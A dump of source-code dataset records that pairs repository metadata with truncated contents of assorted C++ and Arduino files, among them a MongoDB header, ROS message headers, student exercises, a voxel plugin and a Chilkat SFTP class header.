blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
3
264
content_id
stringlengths
40
40
detected_licenses
listlengths
0
85
license_type
stringclasses
2 values
repo_name
stringlengths
5
140
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringclasses
986 values
visit_date
timestamp[us]
revision_date
timestamp[us]
committer_date
timestamp[us]
github_id
int64
3.89k
681M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
23 values
gha_event_created_at
timestamp[us]
gha_created_at
timestamp[us]
gha_language
stringclasses
145 values
src_encoding
stringclasses
34 values
language
stringclasses
1 value
is_vendor
bool
1 class
is_generated
bool
2 classes
length_bytes
int64
3
10.4M
extension
stringclasses
122 values
content
stringlengths
3
10.4M
authors
listlengths
1
1
author_id
stringlengths
0
158
a486b69883cf16705581f213943b826656bfe9ab
08b8cf38e1936e8cec27f84af0d3727321cec9c4
/data/crawl/tar/old_hunk_8.cpp
3f8b7dde7956eda34ea324309b971f69144eb6ac
[]
no_license
ccdxc/logSurvey
eaf28e9c2d6307140b17986d5c05106d1fd8e943
6b80226e1667c1e0760ab39160893ee19b0e9fb1
refs/heads/master
2022-01-07T21:31:55.446839
2018-04-21T14:12:43
2018-04-21T14:12:43
null
0
0
null
null
null
null
UTF-8
C++
false
false
172
cpp
if (expect != 'T') { ERROR ((0, 0, _("Malformed dumpdir: 'T' not preceeded by 'R'"))); return false; } if (p[1] == 0 && !has_tempdir)
[ "993273596@qq.com" ]
993273596@qq.com
049eedf433ed8178c95e6ae505c0af7fadb718b3
9323e66715f92e8847b5f3f499d4c90bba4848e5
/firefox_hook/chrom/stdafx.cpp
5ce31d4483890d23d67f95df5e565385506c58e4
[]
no_license
raja-jamwal/chrom-lib
f2d1788a8d12092d64b1dca26cddef3f2da3d87f
b8320d27831af49c3d416d91a7e902a894bb7f01
refs/heads/master
2021-10-10T13:42:01.704014
2011-11-27T14:19:39
2011-11-27T14:19:39
2,861,084
2
0
null
null
null
null
UTF-8
C++
false
false
292
cpp
// stdafx.cpp : source file that includes just the standard includes // chrom.pch will be the pre-compiled header // stdafx.obj will contain the pre-compiled type information #include "stdafx.h" // TODO: reference any additional headers you need in STDAFX.H // and not in this file
[ "linux1@zoho.com" ]
linux1@zoho.com
3d0b18be5b9245a32ae4803d4741cac327bc68c3
7f460866f379fcd4b904820a342ce515836fe395
/SmartKettle2.0.ino
a6cd1e46514b0cc367fad5d5441c96e58586d4f3
[]
no_license
cmesiasd/SmartKettle2.0
76d780294c66ce5f9aad5c7dd100f3be8649771e
a710d55ae4b7bd9b12898613de67f6521116865c
refs/heads/master
2021-09-21T16:30:44.339229
2018-08-28T16:29:21
2018-08-28T16:29:21
113,630,650
0
0
null
null
null
null
UTF-8
C++
false
false
4,488
ino
//Librerías #include <OneWire.h> #include <DallasTemperature.h> #include <SoftwareSerial.h> #include <PID_v1.h> //Variables #define PinTem 6 //Pin Temperatura #define PinBomba 8 //Pin Bomba de Agua #define PinRele 4 //Pin Relé de Estado Sólido #define T...
[ "djkriizchile@gmail.com" ]
djkriizchile@gmail.com
130a9ccd92ed2d0fe3b7d4bc1887a7b13007e0fd
0b1af6e3dc5b15a5f9eda8908f63af423bd3d847
/midtermTwo/Child.cpp
b0bf67d5b1c5ae0f03c7b0e0f5c2f4cfd20eb895
[]
no_license
ronaldran97/CS2560_nima
c705cafbaba7f5b43bbd30a67a1af71ed560747a
407f9377a55e806ff716765ed3f455bbbb2ec245
refs/heads/master
2020-04-19T05:46:53.519426
2019-05-09T20:51:37
2019-05-09T20:51:37
167,998,173
0
0
null
null
null
null
UTF-8
C++
false
false
209
cpp
// // Created by Ronald Tran on 2019-04-18. // #include "Child.h" int Child::getAllowance() const { return } Child::Child(std::string humansName, int humansAge, char humansSex, Parent m, Parent d) {}
[ "noreply@github.com" ]
ronaldran97.noreply@github.com
7227d89191ee0cfa2927006b5ef82ff7941e4f96
dca9e5c65e79786df5da45d917eb2c2729cd45ab
/For/SPECIALD.CPP
642f12786d3d0810e2c3d25d886bca92791fccc9
[]
no_license
raja21068/C-Programs-Beginners
792650260b359d6c0e5797c6775ff023e9801037
e16110d731dbb6cee346d086b7d1c3038a3a6adb
refs/heads/master
2021-07-25T03:27:39.254067
2017-11-06T05:30:40
2017-11-06T05:30:40
109,651,660
0
0
null
null
null
null
UTF-8
C++
false
false
7,140
cpp
#include <conio.h> #include <iostream.h> #include <dos.h> void main () { // DIAMOND 1 clrscr(); int a, b; for(int i=1; i<=19; i++) { for(int j=1; j<=21; j++) cout<<"*"; cout<<"\n"; } // DIAMOND 2 delay(2000); clrscr(); ...
[ "rajakumarlohano@gmail.com" ]
rajakumarlohano@gmail.com
5eb59c5fc2020e13d5fb58a9f18cc0dea11f4049
70fa0ad1dbc8326130f68309bd61b4e30f2d8a4d
/third_party/mongo/include/mongo/bson/bsonobj.h
0cf423c01ce4d2f6415a5df82c767095dfff1ab5
[]
no_license
alongubkin/mosp
cb21f9faa4b66f2cc6e1f6625c2ab0495b138ef1
bba6ab1a4cb78e75bcd2aa65d748601a355b0a1c
refs/heads/master
2020-04-07T05:54:44.149987
2015-04-10T11:05:50
2015-04-10T11:05:50
24,295,645
1
1
null
null
null
null
UTF-8
C++
false
false
23,048
h
// @file bsonobj.h /* Copyright 2009 10gen Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required b...
[ "alon.gubkin@gmail.com" ]
alon.gubkin@gmail.com
565ab9edb98ba1e9ba16a9300988d24175a444ff
ce2a8c78f4e1bc8c2e06a4c5c0df533589eb4eb6
/CS162/wk6/p3/Prog3/HarryPotter.hpp
fd9bf080baea31fd0d7849de641d85cff008bed4
[]
no_license
grykah/Coursework
f16f73a28883d8160746f1e50ec9f525b81bd190
35640f88d7f2086945e925e2ef0e18e67dbe14fd
refs/heads/master
2023-01-09T12:29:03.256708
2020-11-05T00:58:07
2020-11-05T00:58:07
285,410,312
0
0
null
null
null
null
UTF-8
C++
false
false
980
hpp
/********************************************************************* ** Program Filename: HarryPotter.hpp ** Author: Hailey Wilder ** Date: 2/19/17 ** Description: Contains the derived HarryPotter class definition and ** member declarations. Unlike the other derived ** classes derived from ...
[ "grykah@gmail.com" ]
grykah@gmail.com
4d01462c16c9e9562f09201b1dc2033d9164410a
15c6e07da33440ed4c651223a72a1e6ecfadf994
/Reinforcement Learning/gym_gazebo/envs/enph353/devel/include/gazebo_msgs/GetPhysicsPropertiesRequest.h
bd111bdf6ff46280b84587160d9d9b9227df8227
[]
no_license
evanpham/ENPH353
0033512c904aea99ab29c5c7c460b7191a9c60ae
5fdb62f913a4252a62e0faea6a695658a573c7d9
refs/heads/master
2020-07-31T03:03:06.422919
2019-11-28T01:38:52
2019-11-28T01:38:52
207,925,478
0
0
null
null
null
null
UTF-8
C++
false
false
5,443
h
// Generated by gencpp from file gazebo_msgs/GetPhysicsPropertiesRequest.msg // DO NOT EDIT! #ifndef GAZEBO_MSGS_MESSAGE_GETPHYSICSPROPERTIESREQUEST_H #define GAZEBO_MSGS_MESSAGE_GETPHYSICSPROPERTIESREQUEST_H #include <string> #include <vector> #include <map> #include <ros/types.h> #include <ros/serialization.h> #...
[ "pham@enph353.JoDo" ]
pham@enph353.JoDo
6e929dffc9bf174fe3b6e0b80edc15a41bcbc023
5a81422d857768c76044b44950c40fbd735572eb
/HomeWork2/rasterizer.hpp
faa9db2c70c2e0ad6c4f19850624aa32abbeef48
[]
no_license
Dejavu0709/Games101-HomeWork
2d455a689dde626213ca62380cb947fb2b068e5b
7714c6c7ad734e14521847fbf65de9f27d5121a2
refs/heads/master
2023-01-24T03:13:20.141935
2020-11-25T12:17:44
2020-11-25T12:17:44
297,661,158
1
0
null
null
null
null
UTF-8
C++
false
false
2,582
hpp
// // Created by goksu on 4/6/19. // #pragma once #include <eigen3/Eigen/Eigen> #include <algorithm> #include "global.hpp" #include "Triangle.hpp" using namespace Eigen; namespace rst { enum class Buffers { Color = 1, Depth = 2 }; inline Buffers operator|(Buffers a, Buffers b) { ...
[ "dejavu0709@yeah.net" ]
dejavu0709@yeah.net
cee6f86912c4d8a0e037895dc1eceab75948988f
84ee9844a5892d808a397ae0b355775128cb0090
/sorting_vector.cpp
3aef6e6d475f8c1cc8877bbdb2e820cff3ad42ff
[]
no_license
alexmcmillan86/cpp-projects
66de0ead413dcdd537eab0b3c1b8a74b728cac37
481b15ef87a08b700b5e762c60e0117d576b000c
refs/heads/main
2023-03-04T03:04:44.626524
2021-02-15T08:59:16
2021-02-15T08:59:16
319,091,498
0
0
null
null
null
null
UTF-8
C++
false
false
447
cpp
#include <iostream> #include <algorithm> #include <vector> using namespace std; int main() { vector<int> v { 15, 32, 5, 17, 9, 11 }; sort(v.begin(), v.end()); cout << "Sorted smallest to largest: \n"; for (auto n : v) { cout << n << " "; } cout << endl << endl; sort(v.begin(), v.end(), ...
[ "noreply@github.com" ]
alexmcmillan86.noreply@github.com
8b0f4e3e882af6d930dccc587d056b5b7489f5f7
8fc9bc24846e30e24e41506b3b54814bc5591d02
/RECURSION_maze_path_with_jumps.cpp
0dfd015f213140426b2c435d91488b13f02c52ac
[]
no_license
danny23007/Ds_foundation
e75f5887eaa6c8c6435827c67f3aa22972a7f38c
fe77e65db97e529b1d4f20df94d24db0d6a95ee7
refs/heads/master
2023-05-09T04:20:22.282302
2021-05-25T19:19:18
2021-05-25T19:19:18
291,083,204
0
0
null
null
null
null
UTF-8
C++
false
false
652
cpp
#include<iostream> using namespace std; void print_jumps(int sr,int sc,int dr,int dc,string output){ if(sr==dr && sc==dc){ cout<<output<<endl; return; } // for row for(int mes=1;mes<=dr-sr;mes++){ print_jumps(sr+1,sc,dr,dc,output+"h"); // "h"+mes is not applicable in c++ } for(int mes=1;mes<=dc-sc;me...
[ "noreply@github.com" ]
danny23007.noreply@github.com
7d658b313a06c28087ebcb05022ad424014a5a91
05e1f94ae1a5513a222d38dfe4c3c6737cb84251
/Mulberry/branches/users/kenneth_porter/FromTrunk/Sources_Common/Application/Calendar/Calendar_View/Calendar_Window/CCalendarViewTypes.h
3f56668b9b754030ca53df3f0f7b2b9c9b6f960b
[ "Apache-2.0" ]
permissive
eskilblomfeldt/mulberry-svn
16ca9d4d6ec05cbbbd18045c7b59943b0aca9335
7ed26b61244e47d4d4d50a1c7cc2d31efa548ad7
refs/heads/master
2020-05-20T12:35:42.340160
2014-12-24T18:03:50
2014-12-24T18:03:50
29,127,476
0
0
null
null
null
null
UTF-8
C++
false
false
1,233
h
/* Copyright (c) 2007 Cyrus Daboo. All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless re...
[ "svnusers@a91246af-f21b-0410-bd1c-c3c7fc455132" ]
svnusers@a91246af-f21b-0410-bd1c-c3c7fc455132
1e4a5491a73e1adc459ac48a2845510bb8959d23
876bd1054f79f52111c85b1294aa2fc272eb0a7c
/recursion/multiple_BOJ1629.cpp
5d7034ac630c7b1aaf62acff3991e73f913d3fed
[]
no_license
kiryun/Algorithm
c0d874441dccf73c28acd500d7484ebcd5923615
6648923164b32d87f3b04729c8755a5c9b358581
refs/heads/master
2021-06-30T12:22:33.781172
2021-01-23T16:04:54
2021-01-23T16:04:54
215,088,692
0
0
null
null
null
null
UTF-8
C++
false
false
353
cpp
#include <bits/stdc++.h> using namespace std; typedef long long ll; ll POW(ll a, ll n, ll m){ if(n == 0){ return 1; } ll val = POW(a, n/2, m); val = val*val%m; if(n%2 == 0){ return val; } return val*a%m; } int main(){ ll a, n, m; cin>>a>>n>>m; cout<<POW(a, ...
[ "gihyunkim@Gihyun-MacBookPro.local" ]
gihyunkim@Gihyun-MacBookPro.local
8070882efcc189fe0cdd37f9e23dc0ff724716ea
1e3f2f428b30cd3d722fdd4db34506d4e275574c
/logapp/dboper.h
6e2ef434999e683f91b9113450fab6979190b4ed
[]
no_license
daxingyou/ahzs_easy
3e98ce3e91919c687e00738b16c8f7e3e26a64af
0c268351cc697a7cc1f6d9fcdb72e4a8282981e7
refs/heads/master
2021-05-31T03:12:18.846148
2016-02-18T07:29:14
2016-02-18T07:29:14
null
0
0
null
null
null
null
UTF-8
C++
false
false
672
h
#ifndef __DB_OPER_HEAD__ #define __DB_OPER_HEAD__ #include <mysql.h> #include "pluto.h" #include "defparser.h" #include "other_def.h" class CDbOper { public: CDbOper(int seq); ~CDbOper(); public: //连接数据库 bool Connect(const SDBCfg& cfg, string& strErr); void DisConnect(); TDBID TableInsert(const string& st...
[ "macrogu@qq.com" ]
macrogu@qq.com
573d325a0b9dc8bc5e8723b4f19eba15f5791c44
720ae9963bf9a8abb2941cc55ed377bffef11be8
/deterministic2013Version/deterministic/source/main.cpp
3f2739ea9a54f19d377b911bbcebb3812310c133
[]
no_license
havu73/segmentationClock2016
34aa27519b75d5d27dea7c6b3ce6a769068a610d
d421c038aabac6a3ffa9f17307497f6ca2bb2223
refs/heads/master
2021-01-11T10:11:20.542099
2017-06-15T20:01:05
2017-06-15T20:01:05
72,581,600
0
0
null
null
null
null
UTF-8
C++
false
false
5,579
cpp
#include <time.h> #include "main.hpp" // Function declarations #include "structs.hpp" #include "init.hpp" #include "sim.hpp" using namespace std; extern terminal* term; // Declared in init.cpp /* main is called when the program is run and performs all program functionality parameters: argc: the number of command...
[ "aylab@cu84386m.colgate.edu" ]
aylab@cu84386m.colgate.edu
9679d68ca085d30e556c2df670e7d39bed6b32a3
cf833d4b6195e64e483685e4b0e21843c0eee659
/Crystal.cpp
1705052044689667bacff64d712c69b5e2c1160b
[]
no_license
CyanBlob/CyanEngine
26f65cb0e114ce86c7d36d179032556a72576b4d
f1e63e6ee99a11a4d645027ab66d222038097237
refs/heads/master
2021-09-11T16:26:04.704929
2018-01-20T03:38:41
2018-01-20T03:38:41
82,486,885
1
0
null
null
null
null
UTF-8
C++
false
false
685
cpp
#ifndef Included_Crystal_H #define Included_Crystal_H #include "Crystal.h" #endif #include <iostream> Crystal::Crystal(location _position) : Material(_position) { pos = _position; imageFile = "resources/crawl_tiles/item/misc/misc_crystal.png"; colliderType = ITEM; } bool Crystal::checkCollision(Object *obj) { } v...
[ "andrewjamest1993@protonmail.com" ]
andrewjamest1993@protonmail.com
946238614c9904f502f21682ca464b446a40e8e2
fb7fad57b6a816d2b2c5d9da578e75cffbe5bedd
/Lumos/Source/Lumos/Graphics/Renderers/LineRenderer.cpp
3380e5ecb74e74836d20fce5d5e3932b09cb403b
[ "MIT", "LicenseRef-scancode-public-domain" ]
permissive
full-dev1010/C-2D-3D-game-engine
405cf4febc3f56b8a40506b8107f1e2a7f914769
f5e6a2b4d938386e2886e22a9a7aad52a22086ad
refs/heads/master
2023-06-26T15:23:59.675035
2021-07-28T19:02:32
2021-07-28T19:02:32
390,468,997
1
0
null
null
null
null
UTF-8
C++
false
false
11,245
cpp
#include "Precompiled.h" #include "LineRenderer.h" #include "Core/OS/Window.h" #include "Graphics/RHI/Shader.h" #include "Graphics/RHI/Framebuffer.h" #include "Graphics/RHI/UniformBuffer.h" #include "Graphics/RHI/Renderer.h" #include "Graphics/RHI/CommandBuffer.h" #include "Graphics/RHI/Swapchain.h" #include "Graphics/...
[ "wine1993228@gmail.com" ]
wine1993228@gmail.com
525a8d2a3411d92985b55e5d471f104517cea0d0
8419eaa22e58a2efbb7bdf1bccfc66a9e3288d75
/tensorflow/core/platform/cloud/gcs_file_system_test.cc
32bd946a679d14ec5a58f806074b528fd87d1dad
[ "Apache-2.0" ]
permissive
PipelineAI/tensorflow
f539227fd5d3f304b4f246877e35303dbd388a0c
5d8e69768230ea8765a7c78cf1fa22c3ab2a4757
refs/heads/master
2021-05-05T21:54:02.830548
2018-01-15T04:30:05
2018-01-15T04:30:05
115,791,564
0
1
Apache-2.0
2018-01-15T05:38:46
2017-12-30T11:08:37
C++
UTF-8
C++
false
false
109,505
cc
/* Copyright 2016 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or a...
[ "gardener@tensorflow.org" ]
gardener@tensorflow.org
03cef3e8c50345d8ee51b934c4e9c59b31593a6e
58bf62494b84cadca61bccae138c5d7053de1cba
/2018:2019/P3/src/funciones.hpp
fafd3548c08f8c701f33202aab1cc530187659b9
[]
no_license
JJ-learning/Algoritmica
257eaa37b189697e60f3177a9e3154ff4ce4d127
d9e1e54cc90da23f3399ba2dd43f46af3a4d88f7
refs/heads/master
2023-04-08T08:20:09.027960
2019-02-04T12:28:15
2019-02-04T12:28:15
null
0
0
null
null
null
null
UTF-8
C++
false
false
464
hpp
#ifndef FUNCIONES__ #define FUNCIONES__ #include <iostream> #include <vector> #include <fstream> #include <assert.h> #include <algorithm> #include <tgmath.h> #include "Conjunto.hpp" void askUser(Conjunto C, int k, Conjunto ksmallest); void getSmallest(int begin, int end, int x, Conjunto C, Conjunto &ksmallest, int &...
[ "juanjo96mt@gmail.com" ]
juanjo96mt@gmail.com
2b8d989b38f623306260a039291904f6203c766b
96f4f6a44474dd44e032b8f62c65f7da58664123
/Project1/Project1/Source/Knight.h
e0951864ce359028751f5da4115f4f1f88fe6e88
[]
no_license
dougdecarli/Knight-vs-Zombies-OpenGL
55a48d837e8e6ed47505bb9698b9930092b22961
9203a490012963b468aea047ef33ec4b87e572e2
refs/heads/master
2020-05-18T20:31:44.757447
2019-06-13T18:34:01
2019-06-13T18:34:01
184,636,455
0
0
null
null
null
null
UTF-8
C++
false
false
6,294
h
#pragma once #include "GameObject.h" class Knight : GameObject { private: VertexArrayObject m_vao; Shader m_shader; Texture m_texture; GLfloat m_offsetX; GLfloat m_offsetY; Direction m_direction; KnightAction m_action; glm::mat4 m_mvp; glm::mat4 m_model; glm::mat4 m_view; glm::mat4 m_proj; int m_sync; b...
[ "dougla.immig@cwi.com.br" ]
dougla.immig@cwi.com.br
5c7be6a55a6313d179dbfb53ca876a1ee51a54b1
84ed927fe4ffff4d7e23906a6909613bd99da8c5
/Kuyruk-Queue/Kuyruk/Kuyruk/Fonksiyonlar.cpp
86dd9f14c95f59b57123c38ccc9f975cdb28465c
[]
no_license
DenizhanSarac/CPlusPlus---Tree---Heap---Stack
e7aafb60a0dd4e5f394467ad68a67b14eab2d431
ac497082b4bb1ff487d9d1fe7e117873b65c45f4
refs/heads/master
2023-03-03T16:03:33.247751
2021-02-16T20:55:00
2021-02-16T20:55:00
339,088,818
0
0
null
null
null
null
UTF-8
C++
false
false
841
cpp
#include <iostream> #include <stdbool.h> #include <conio.h> #include "Header.h" using namespace std; void degerBaslangic(kuyruk *k) { k->cephe = 0; k->geri = -1; k->sayim = 0; } bool doluMu(kuyruk *k) { return(k->sayim == Boyut); } bool bosMu(kuyruk *k) { return(k->sayim == 0); } void elemanekle(kuyruk *k, int ...
[ "dnzhn.src@outlook.com" ]
dnzhn.src@outlook.com
34cda5f8aceda5aae6e4cefa28cd3270c43a804f
32812e9766c30384842c0873716eb1b59f016b05
/leetcode/LengthofLastWord.cpp
09dfd9b978690ef0d1439eeeef3070057496638a
[]
no_license
chenxiaohui/leetcode
7d9c6697b3a450785c7b3342ad043820552a9a69
22d5849ea5fba76459c0293ce07c33c2e18a47a1
refs/heads/master
2021-01-20T11:42:05.693428
2019-07-03T11:04:21
2019-07-03T11:04:21
30,222,676
0
0
null
null
null
null
UTF-8
C++
false
false
417
cpp
/* Given a string s consists of upper/lower-case alphabets and empty space characters ' ', return the length of last word in the string.If the last word does not exist, return 0.Note: A word is defined as a character sequence consists of non-space characters only. For example, Given s = "Hello World", return 5. */ #...
[ "sdqxcxh@gmail.com" ]
sdqxcxh@gmail.com
dfa8a19b4e44f53d0c66047179538362d62e4719
f7d8fb65ee02133f612630f80a77dfbd92facb08
/Прямые измерения/Прямые измерения/MyForm.h
36bd1552eedd326039f03fb521112d9992da8676
[]
no_license
SKstarSK/My_Projects
5ff145892cbe7b3e0f2e1896c4a372eb60146a4b
eebfef2f67af9d372ce1fe2506837a96098f6c14
refs/heads/master
2022-11-21T20:16:39.646839
2020-07-19T13:20:07
2020-07-19T13:20:07
202,874,784
0
0
null
null
null
null
WINDOWS-1251
C++
false
false
27,419
h
#pragma once #include <cmath> namespace Прямыеизмерения { using namespace System; using namespace System::ComponentModel; using namespace System::Collections; using namespace System::Windows::Forms; using namespace System::Data; using namespace System::Drawing; /// <summary> /// Сводка для MyForm /// </summa...
[ "bolotin.n95@gmail.com" ]
bolotin.n95@gmail.com
af785ec04cefd1195f859f22804c97fef7f13a02
e9ed8f198134984a9342e50d96a454a0ed1e094a
/AR-VR/Anupam1603_AnupamTiwari_2024it1139_2/Patterns/p4.cpp
5f1ae01c0ed4cd255b57a7c6924eea1d58a9b29e
[]
no_license
divyaagarwal24/coderspree
20978b6dabefd84cac1343fffa79741bd6372046
7aafdab534bbab8dd1073007d83517470aae3492
refs/heads/main
2023-08-26T12:15:52.236087
2021-11-10T11:48:55
2021-11-10T11:48:55
412,049,822
0
1
null
2021-09-30T12:09:47
2021-09-30T12:09:47
null
UTF-8
C++
false
false
279
cpp
#include<iostream> using namespace std; int main() { int n; cin>>n; int str=n,space=0; for (int i=1;i<=n;i++) { for (int j=1;j<=space;j++) { cout<<"\t"; } for(int j=1;j<=str;j++) { cout<<"*\t"; } cout<<endl; space++; str--; } }
[ "30565750+tushar5526@users.noreply.github.com" ]
30565750+tushar5526@users.noreply.github.com
d63c4956e78a21e82fc47061740a2562d662cdc7
ed7714446138f3b50389b98c9a62032b0b7284ea
/Web/sakshiv278_SaksheeVarshney_1923co1045_3/FunctionAndArrays/AnyBaseToDecimal.cpp
99d912c1718c63ded444ddc7a65787bdd88dd02a
[]
no_license
sahilgithub908/coderspree
ce8c3a2856d34002ee2fa0e46ee1c700c0de5c42
e7ebfa516b8e29aa4a475f3696593f8a02014064
refs/heads/main
2023-09-06T00:12:10.922227
2021-11-17T19:59:12
2021-11-17T19:59:12
412,049,646
0
0
null
2021-09-30T12:09:18
2021-09-30T12:09:18
null
UTF-8
C++
false
false
298
cpp
#include<bits/stdc++.h> using namespace std; int AnyToDec(int n, int b) { int d=0,ans=0; while(n>0){ int r = n%10; ans=ans+r*pow(b,d); n=n/10; d++; } return ans; } int main() { int n; int b; cin >> n; cin >> b; int res = AnyToDec(n, b); cout << res << endl; }
[ "30565750+tushar5526@users.noreply.github.com" ]
30565750+tushar5526@users.noreply.github.com
18db3b1d962d15df325fed1dc6483b56c2941b77
11c975a01a0a7c57f24de8347b1ad51ad268b190
/qolympusinterface.cpp
45186050df1ae62351c4d86ef330308f81541926
[]
no_license
discordj/QOlympusCamera
a6c2a586465a10c6abe431dd28b986c822981250
f81b46446f58f27a2f8c9c0a8eee914612bf104c
refs/heads/master
2020-05-18T12:01:06.700944
2013-04-12T01:09:04
2013-04-12T01:09:04
9,267,522
1
0
null
null
null
null
UTF-8
C++
false
false
3,239
cpp
#include "qolympusinterface.h" //CALLBACK STUFF int CALLBACK _mochaImageReady(unsigned int icam, unsigned int ulObjHandle, void *pParam) { QOlympusInterface *caminterface = (QOlympusInterface *)pParam; ((QOlympusCamera *)caminterface->getCamera(icam))->image_ready(ulObjHandle); return 0; } int CALLBACK _mochaDevic...
[ "discord_jb@gmail.com" ]
discord_jb@gmail.com
ef3fa69dbb400d1981be83a7351dd47d018aa41b
a2fc06cf458f896d2217592ac92098863e755a9c
/src/program/vehiclesim/spawn_software.cpp
a06e623abb524e38d44a432511a23b9bcc2305a9
[]
no_license
MrBrood/Stanford-Junior-self-driving-car
ba3f2a07a9366d3566def59fd25f90bad55748d2
d999e94bb287933666dac82129cad6702923a8e1
refs/heads/master
2023-07-18T04:56:02.055754
2020-08-21T01:31:46
2020-08-21T01:31:46
null
0
0
null
null
null
null
UTF-8
C++
false
false
1,005
cpp
#include <roadrunner.h> #include <sys/wait.h> char *libpath = NULL; int spawn_process(char *command, char *env) { char lparam[200]; char *envlist[3]; int spawned_pid; if((spawned_pid = fork()) == 0) { envlist[0] = env; if(libpath != NULL) { sprintf(lparam, "LD_LIBRARY_PATH=%s", libpath); ...
[ "6959037@qq.com" ]
6959037@qq.com
2db7813666b5643e8cf514a281a7b9ee0b2acf7b
0430ecdfae9e6e8ef493445229b05b08c227c88c
/Plugins/Voxel/Source/Voxel/Classes/PerlinNoiseWorldGenerator.h
51dbe3e237f7f0e819106bcf6b8c4d887d21d95c
[ "MIT" ]
permissive
luoxz-ai/MarchingCubes
6180a90effbedb84d269dbc76bddc30b2580ce5f
9b7b73f72e0a681b59c60ce7c248d2e677cac81d
refs/heads/master
2021-06-24T12:06:41.423213
2017-09-09T21:02:39
2017-09-09T21:02:39
null
0
0
null
null
null
null
UTF-8
C++
false
false
564
h
// Copyright 2017 Phyronnaz #pragma once #include "CoreMinimal.h" #include "VoxelWorldGenerator.h" #include "PerlinNoise.h" #include "PerlinNoiseWorldGenerator.generated.h" /** * */ UCLASS(Blueprintable) class VOXEL_API APerlinNoiseWorldGenerator : public AVoxelWorldGenerator { GENERATED_BODY() public: APerlinN...
[ "phyronnaz@gmail.com" ]
phyronnaz@gmail.com
9600da99ac9c8e43d01e55c46be641272fe1c2da
c3d3062f0fdd751a49ccbe907cff41aa4680b42b
/source/ZookieWizard/WindowsManager.cpp
c071d9a8c9e3dcf75e6fd590aa33f1c97001d077
[]
no_license
Flower35/ZookieWizard
5a233d71f2202ae120dd7c160e8d022a40c15eeb
1d398f194e1ad74d5b6cf7f865dc2baab33936b7
refs/heads/master
2023-06-07T04:34:27.333278
2022-08-18T17:12:13
2022-08-18T17:12:13
228,497,238
12
6
null
null
null
null
UTF-8
C++
false
false
44,617
cpp
#include <ZookieWizard/WindowsManager.h> namespace ZookieWizard { namespace GUI { //////////////////////////////////////////////////////////////// // EXTERNAL OBJECTS AND VARIABLES //////////////////////////////////////////////////////////////// WindowsManager theWindowsManager...
[ "46760021+Flower35@users.noreply.github.com" ]
46760021+Flower35@users.noreply.github.com
e788b2cf71d108eabae3070761bd71d4af230bb9
b3aeb7daa519b11c7021d2d266272f536327d31f
/src/ising/Eigen/periodicfunction.cpp
3cbc78d517f3580ec02598a6e1b50ebf345d73a2
[]
no_license
chivalry123/MAXSAT_Ising_solver_Ginar
bee2f47620558e1cf1a2e53ffbc3b486a0a7b89b
ecb743aa58e6abb92b873c280d25d4104f9ecc1a
refs/heads/master
2020-12-30T09:26:41.507890
2017-08-16T16:15:04
2017-08-16T16:15:04
100,407,411
1
0
null
null
null
null
UTF-8
C++
false
false
32,943
cpp
#include "periodicfunction.h" using namespace std; using namespace ::boost::tuples; using namespace ::boost; void periodic(int a0, int a1, int a2, int a3, int a4, int a5, map<set<tuple<int,int,int,int,int> >, double> &J, int x_range, int y_range, int z_range, map<int,int> com...
[ "key01027@ginar.lbl.gov" ]
key01027@ginar.lbl.gov
0d33c10a5157df3edeeb2017b35cdc7026cfcd6c
9dfd2390e654dc2c2eed29b58c8a062118b7b8b4
/ios/chrome/browser/overlays/test/fake_overlay_presentation_context.cc
55053f320cbcb87f33f460694c5dae80d9e496e5
[ "BSD-3-Clause" ]
permissive
tongchiyang/chromium
d8136aeefa4646b7b2cf4c859fc84b2f22491e49
58cf4e036131385006e9e5b846577be7df717a9c
refs/heads/master
2023-03-01T18:24:50.959530
2020-03-06T07:28:27
2020-03-06T07:28:27
245,365,574
1
0
null
2020-03-06T08:22:06
2020-03-06T08:22:05
null
UTF-8
C++
false
false
4,108
cc
// Copyright 2019 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "ios/chrome/browser/overlays/test/fake_overlay_presentation_context.h" #include "base/bind.h" #include "base/logging.h" #include "ios/chrome/bro...
[ "commit-bot@chromium.org" ]
commit-bot@chromium.org
ef28534ca3e696c2779ce5c6e0f4eb9c462d7462
099b2bea060344bacbc9ea273da69be822dbdd03
/ccsc/include/CkSFtpFileW.h
a0b38a6b6c202405c4aea96e613b5f658d19e43c
[]
no_license
marcin-filipiak/qt_ccsc
ff8c09fa2ec7262dfc2e425b6add1baac1ec5314
034299623939b2c0bff41cc3d50b9d8ca81a2f0f
refs/heads/master
2020-09-04T13:47:27.326474
2019-11-05T13:09:57
2019-11-05T13:09:57
219,747,777
0
0
null
null
null
null
UTF-8
C++
false
false
8,754
h
// CkSFtpFileW.h: interface for the CkSFtpFileW class. // ////////////////////////////////////////////////////////////////////// // This header is generated for Chilkat v9.5.0 #ifndef _CkSFtpFileW_H #define _CkSFtpFileW_H #include "chilkatDefs.h" #include "CkString.h" #include "CkWideCharBase.h" cla...
[ "kolgreen@mf-elitebook.NE" ]
kolgreen@mf-elitebook.NE
b35c7e75dc127cb87713934419f560c939ea60a7
fb86f0dca6e525b8a8ddb63f10b8d220ddd7f7fe
/src/sapling/key_io_sapling.h
34689508fe7a9c8b369b56f2a6d0f4eb79f7b402
[ "MIT" ]
permissive
ORO-mlm/UNO-Core
14fcdb3c2db4bde256e48ea661ada61579ccf403
d6e6769ce57466cfc9e7cab681eab880cdb8e3e8
refs/heads/main
2023-06-16T08:21:00.808606
2021-07-12T07:08:35
2021-07-12T07:08:35
383,350,655
0
0
null
null
null
null
UTF-8
C++
false
false
1,023
h
// Copyright (c) 2016-2018 The Zcash developers // Copyright (c) 2020 The PIVX developers // Copyright (c) 2021- The UNO developers // Distributed under the MIT software license, see the accompanying // file COPYING or http://www.opensource.org/licenses/mit-license.php. #ifndef UNO_KEY_IO_SAPLING_H #define UNO_KEY_IO_...
[ "brandon2davincci@gmail.com" ]
